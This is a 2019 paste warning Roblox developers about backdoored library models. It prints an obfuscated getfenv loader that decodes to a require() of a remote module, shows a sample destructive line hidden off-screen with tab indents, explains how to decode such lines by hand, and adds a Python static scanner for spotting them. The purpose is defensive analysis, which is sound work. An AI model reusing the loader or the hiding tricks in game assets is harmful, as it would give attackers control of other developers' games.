Untitled

a guest
Nov 11th, 2019
--[[

First off, I'd like to say that this model is not malicious and was not botted to the front page; there is no malicious intent at all. You may assume otherwise, but there are no scripts at all.

-- > Please read down below, this is extremely important for everyone that uses models & plugins - any other asset type does **not** have a virus or a 'backdoor' which can grant malicious people access to your game.

Recently the Roblox library section has been overtaken by botted models, decals, plugins and even audio. The important part is the models & plugins - they can carry malicious code even when they are disguised as a real model that you'd see on a daily basis while browsing random models.

This type of asset can execute something called a virus, more commonly known as a backdoor. It cannot break out of your game or Studio ( you can't get an actual virus on your PC ); the backdoor can execute multiple malicious scripts such as teleporters, random marketplace prompts that show a T-shirt, administrator commands & more, which obviously you wouldn't want to have in your game.

To find a backdoor in a model, all you have to do is look at the scripts in a front page model. Here's an example:

https://www.roblox.com/library/3257382329/2M-Sign

This sign looks completely legitimate & safe to use, however it really isn't - there are a few scripts located in the model's directory. One is safe, the other is malicious.

You may be asking yourself 'Where is it?' or 'I can't see it'. Well, if we look in the 'Text' part's directory and open up the script in 'TextLabel' called 'SetText', you can see some code which still makes you think that it's 100% legit and safe to use, however **it isn't**: the malicious part is pushed far to the right on one of the lines using tab indents. Here's an example:

game:GetService("Workspace").Terrain:Clear() print("malicious code here!")

The malicious code is indented out of your scripting frame so you wouldn't notice it. That applies only to that one specific model; in other models it could be disguised as a regular script/module require or placed at the bottom of the script.

Such code is usually obfuscated, mostly with Synapse Xen, Luraph or Ironbrew, which are 3 services made for script obfuscation - meaning you cannot read the source code to see what the script really does.

However, the script in that model **is not** obfuscated. It uses a function called getfenv, which most backdoors use to load in a require module ( a different model that handles the malicious code ); example:

getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))

The numbers after the backslashes are decimal escape sequences ( character codes ), so we can dissect the line by printing the escaped strings, which gives us the names of the functions the script uses:

print("\101\114\105\117\113\101\114\116\111\110\117\109\98\101\114\99\104\97\114\117\110\112\97\99\107")

That gives us 4 function names to dissect in order to reach the require module handler for that backdoor: 'eriuqer' ( which string.reverse turns into 'require' ), 'tonumber', 'char' and 'unpack'.

Once you finish deobfuscating the script, you are left with a table; unpacking it and passing it through char and tonumber gives you a Roblox library asset ID that is handed to require(). In this case it's 'require(3426799265)'.

You look up the asset ID and you get the model. Open the ModuleScript up and it's all obfuscated with one of the providers I've listed above - you can't really deobfuscate it, although you can use programs such as

minify made by stravant - https://www.roblox.com/library/197760456/Stravant-Minify-Beautify

It doesn't deobfuscate it fully, however it does help you read the code bit by bit and organize the indents.

To prevent your game from having backdoors, please use this safety plugin made by a Developer Forum member on Roblox

Link: https://www.roblox.com/library/2670956620/Hidden-Infection-Script-Detector
How to use: https://devforum.roblox.com/t/v2-1-plugin-hidden-backdoor-infection-script-detector-detects-removes-infections-from-malicious-plugins/216692

Remember to stay safe and not to have malicious backdoors/viruses in your game

~daniel#0003
F to all the backdoors

']]
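
The manual decoding of the getfenv line described in the paste can be done statically, without ever running the script. The following Python scanner is an added example, not part of the original paste or of any Roblox tool; its function names are made up for illustration, and it assumes a byte table in the line is what gets passed through string.char and tonumber, as in the quoted sample.

```python
import re

# The obfuscated line quoted in the paste, held as a raw string so it is
# only ever inspected as text and never executed.
SAMPLE = r'getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))'

LITERAL = re.compile(r'(string\.reverse\(\s*)?"((?:\\.|[^"\\])*)"')
ESCAPE = re.compile(r'\\(\d{1,3})')
BYTE_TABLE = re.compile(r'\{\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\}')

def _unescape(m):
    value = int(m.group(1))
    # Lua rejects decimal escapes above 255, so leave those untouched.
    return chr(value) if value <= 255 else m.group(0)

def hidden_names(source):
    """Decode every string literal, undoing string.reverse() where it wraps one."""
    names = []
    for m in LITERAL.finditer(source):
        text = ESCAPE.sub(_unescape, m.group(2))
        names.append(text[::-1] if m.group(1) else text)
    return names

def asset_ids(source):
    """Decode {48,88,...} byte tables and keep those that parse as a number."""
    ids = []
    for m in BYTE_TABLE.finditer(source):
        values = [int(v) for v in m.group(1).split(",")]
        if any(v > 255 for v in values):
            continue  # not a table of character codes
        text = "".join(map(chr, values))
        try:
            # Lua's tonumber() reads a 0x/0X prefix as hexadecimal.
            ids.append(int(text, 16) if text.lower().startswith("0x") else int(text))
        except ValueError:
            pass  # the table decodes to something that is not a number
    return ids

def report(source):
    """Summarise what a reviewer needs: decoded names, ids, and red flags."""
    names = hidden_names(source)
    return {
        "names": names,
        "asset_ids": asset_ids(source),
        # 'require' only appears after decoding, i.e. it was deliberately hidden
        "hidden_require": "require" in names and "require" not in source,
        "uses_getfenv": "getfenv" in source,
    }

if __name__ == "__main__":
    print(report(SAMPLE))
```

Running it over each script's source exported from a model flags lines where require is reachable only through decoded strings, and lists the asset IDs to look up before the model goes into a game.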